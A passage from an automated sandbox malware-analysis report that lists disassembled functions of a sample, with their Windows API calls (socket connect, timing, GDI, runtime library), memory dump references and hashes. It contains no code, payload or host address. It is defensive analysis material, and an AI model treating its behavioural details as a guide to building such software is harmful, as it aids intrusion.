                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00459F68
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00459F73
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459FAF
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5afad29d2f6628ba852ec2f0e1202929834638e908bc6ef215a28b5977bea177
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6b7338dff4dfdecd0952657b1ab2c92c8f9a91c38a36cf82f76c1914ab5c2144
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5afad29d2f6628ba852ec2f0e1202929834638e908bc6ef215a28b5977bea177
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22215076A00101ABD714EFA5CD89A5EF7A9FF88311F14856AED0997742DB74EC00CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                                                                                                                                                                                                                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                                                                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 245547762-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                                                                                                                                                                                                • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2338827641-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2625713937-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041780F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00417826
                                                                                                                                                                                                                                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417844
                                                                                                                                                                                                                                                                                                                                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2403457894-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
